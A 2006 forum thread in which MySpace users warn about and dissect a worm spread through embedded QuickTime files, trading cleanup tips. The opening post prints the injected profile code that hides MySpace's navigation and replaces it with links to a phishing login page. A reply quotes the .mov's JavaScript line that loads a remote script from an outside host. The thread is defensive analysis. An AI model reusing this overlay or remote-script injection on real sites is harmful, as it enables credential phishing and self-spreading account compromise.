kaneso Posted November 29, 2006 Share Posted November 29, 2006 (edited) anyone use myspace? just tonight on a bunch of profiles i see this quicktime .mov file appearing everywhere. Well it automatically plays and as soon as i view my homepage it has appeared on mine. Anyways what it bassically does is change all the links on the myspace layouts to link to http://almobty.com/css/login.html which is obviously a spoofed myspace login page and MANY people will fall for this. this is obviously trying to steal passwords and isnt just a proof of concept like some past myspace exploits. You can easily get rid of this by removing the code in your movies sections and removing the junk code in about me section which changes the links. Im not coder but here is the code :(maybe someone could examine it?) About Me: <style type="text/css"> div table td font { display: none } div div table tr td a.navbar, div div table tr td font { display: none } .testnav { position:absolute; top: 136px; left:50%; _top: 146px } </style><div style="z-index:5; background-color: #6698CB; margin-left:-400px; width: 800px" align="center" class="testnav"><div style=""><a href="http://almobty.com/css/login.html" target="" class="navbar">Home</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Browse</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Search</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Invite</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Film</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Mail</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Blog</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Favorites</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Forum</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Groups</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Events</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Videos</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Music</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Comedy</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Classifieds</a></div></div> Movies <div style="width: 1px; height: 1px; overflow: hidden; text-indent: -9999px"><embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" src=http://almobty.com/css/piAF2iuswo.mov /></div> The problem is as soon as you visit another profile with it, it comes back and its spreading like wildfire, so maybe remove and keep a low profile for the time being? http://almobty.com appears to be a foreign website for contracting Im running firefox 2 (so doesnt only effect IE) Here is an example: Edited November 30, 2006 by kaneso coahboolley 1 Share Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/ Share on other sites More sharing options...
nvme Posted November 29, 2006 Share Posted November 29, 2006 heh.. nice. probably wouldn't hurt to send the myspace people an email and let them know, if they dont already. Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588093891 Share on other sites More sharing options...
Rappy Veteran Posted November 29, 2006 Veteran Share Posted November 29, 2006 Theres alot of this crap around lately to do with Myspace...thats why I have stayed away from them and been using Facebook...my mates myspace got accessed like that and he had all his friends deleted and messages sent to people saying obscene things...:( Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588093920 Share on other sites More sharing options...
tomwarren Veteran Posted November 29, 2006 Veteran Share Posted November 29, 2006 Cool posted - thanks Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588093931 Share on other sites More sharing options...
micro Posted November 29, 2006 Share Posted November 29, 2006 I been off myspace for 5 months now, was sick of all the crap and slow server speed. Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588093959 Share on other sites More sharing options...
XPGoD Posted November 30, 2006 Share Posted November 30, 2006 Looking at the code, it is meant to redo the entire thing... basically redo your entire profile. But there is code in it that does nothing. I think someone modified a hack from the past, and it's gotten out of control. That imageshack photo is kinda odd... eh? Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588094732 Share on other sites More sharing options...
Syntex Posted November 30, 2006 Share Posted November 30, 2006 it is a redirect exploit seemingly enough, the mov is used as means of spreading it adds the css code into your profile and uses it to phish you. That sall, and as far as the site it is being hosted on odds are it is a hacked server, what i would be worried about is if someone takes the spread code and uses it for something else. Thkn abotu it if they are able to get the code to edit yoru profile with a mov file just what else could be done with this Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588094802 Share on other sites More sharing options...
batbeef Posted November 30, 2006 Share Posted November 30, 2006 thanks for the heads up Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588095105 Share on other sites More sharing options...
d_fens Posted November 30, 2006 Share Posted November 30, 2006 http://www.cake.fi/images/login.html is where http://almobty.com/css/login.html rediects to. More than likely it was some script kiddie. The cake.fi server seems to be down though. It seemed to be a cafe shop or something but the DNS server has changed. Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588095677 Share on other sites More sharing options...
n_K Posted November 30, 2006 Share Posted November 30, 2006 (edited) heh, all movies from myspace are down. myspace is crap anyway, why do people still use it ? also, http://almobty.com DNS info: Name Servers: NS1.ALL-SOLUTION.NET NS2.ALL-SOLUTION.NET Technical Contact: Almobty Co. Al-Mobty Company for contracting (webmaster@deltawww.net) +966.4658695 Fax: +966.4659242 Olaya Street, POBox 7705 Riyadh 11472, Tel. 966-1-4658695 & Fax. 4659242 RIYADH, 11472 SA Damn, thats a good hacker :) part source of QT file: <java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig... Edited November 30, 2006 by n_K Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588095950 Share on other sites More sharing options...
l0g0ut Posted November 30, 2006 Share Posted November 30, 2006 open 'host' file.... add entry 127.0.0.1 www.myspace.com Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588095962 Share on other sites More sharing options...
»X« Posted November 30, 2006 Share Posted November 30, 2006 Theres alot of this crap around lately to do with Myspace...thats why I have stayed away from them and been using Facebook...my mates myspace got accessed like that and he had all his friends deleted and messages sent to people saying obscene things...:( lol Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588095969 Share on other sites More sharing options...
superzz Posted November 30, 2006 Share Posted November 30, 2006 heh, all movies from myspace are down. myspace is crap anyway, why do people still use it ? also, http://almobty.com DNS info: Name Servers: NS1.ALL-SOLUTION.NET NS2.ALL-SOLUTION.NET Technical Contact: Almobty Co. Al-Mobty Company for contracting (webmaster@deltawww.net) +966.4658695 Fax: +966.4659242 Olaya Street, POBox 7705 Riyadh 11472, Tel. 966-1-4658695 & Fax. 4659242 RIYADH, 11472 SA Damn, thats a good hacker :) part source of QT file: <java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig... If you uses a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have download the js.js and looked at the code it just seem try to write over your formating and the it spams every 6 sec. to random id. Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588096860 Share on other sites More sharing options...
Des429 Posted November 30, 2006 Share Posted November 30, 2006 ITS THE RING!!11!!11 Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588096912 Share on other sites More sharing options...
n_K Posted December 1, 2006 Share Posted December 1, 2006 If you uses a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have download the js.js and looked at the code it just seem try to write over your formating and the it spams every 6 sec. to random id. yeh, but it writes the javascript through the quicktime file so open the quicktime .mov in notepad, look at the binary followed by "apple text writer plugin" Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588098352 Share on other sites More sharing options...
lerum Posted December 1, 2006 Share Posted December 1, 2006 lol looks like cake.fi felt the extra traffic and died :p coahboolley 1 Share Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588099039 Share on other sites More sharing options...
rusonjitsu Posted December 2, 2006 Share Posted December 2, 2006 just add http://almobty.com to your hosts file ;) Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588101813 Share on other sites More sharing options...
+John Teacake MVC Posted December 2, 2006 MVC Share Posted December 2, 2006 (edited) I got this, Does the users PC become infected with anything? When I view my profile and click home I get re directed to http://www.../images/login.html Which doesnt go anywhere obviously, Has this thing installed anything on my PC? Edited December 2, 2006 by Sawyer12 Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588101956 Share on other sites More sharing options...
lerum Posted December 2, 2006 Share Posted December 2, 2006 It looks like myspace have obviously removed that link from the site. I doubt its installed any spyware and such on you computer, it looks like its just a scam site. Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588102129 Share on other sites More sharing options...
Inplode Posted December 2, 2006 Share Posted December 2, 2006 myspace = crap ! Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588102176 Share on other sites More sharing options...
Popcorned1 Posted December 2, 2006 Share Posted December 2, 2006 You guys are so biased, we get paypal scams all the time, but you don't run around saying how crap that is. MySpace has a few in the news and you start slagging off MySpace within seconds. MySpace may be crap, but hell. It's great crap. Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588102573 Share on other sites More sharing options...
+John Teacake MVC Posted December 3, 2006 MVC Share Posted December 3, 2006 Whats going on with Myspace, The new one directs to http://www.daviddraftsystem.com/images/login.html :no: :unsure: :wacko: :| Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588105373 Share on other sites More sharing options...
+John Teacake MVC Posted December 4, 2006 MVC Share Posted December 4, 2006 Are there any clear cut tutorials on how to get rid of this? Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588108089 Share on other sites More sharing options...
jerzdawg Posted December 4, 2006 Share Posted December 4, 2006 Are there any clear cut tutorials on how to get rid of this? you have to clean up all of the sections on your page.... Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588108151 Share on other sites More sharing options...
sdfhuigtreb Posted January 11, 2007 Share Posted January 11, 2007 This has actually been around for a while. I took note of it back in October and thought nothing of it. I even warned people about this .mov exploit and nobody really listened. I guess I should have posted something here, eh? :laugh: . This has happened to me twice now, and yes, I know how to get rid of it. But I'm tired of the insecure status of Myspace, and therefore have deleted my account. I'm glad someone made this public, as it should be addressed to both Myspace and the people who use it. Everyone who has contributed to this thread thus far has explained the majority of this exploit. There are several sources of the .mov and I don't think this will be fixed for a while. I suggest that you leave Myspace as soon as possible, people. I'm actually glad this happened to me more than once; now I won't be wasting any MORE time. :laugh:. It's only going to get worse from here on, and we can't really do anything about it. Ah well. I guess that's how it goes... :p Link to comment https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/#findComment-588214355 Share on other sites More sharing options...
Recommended Posts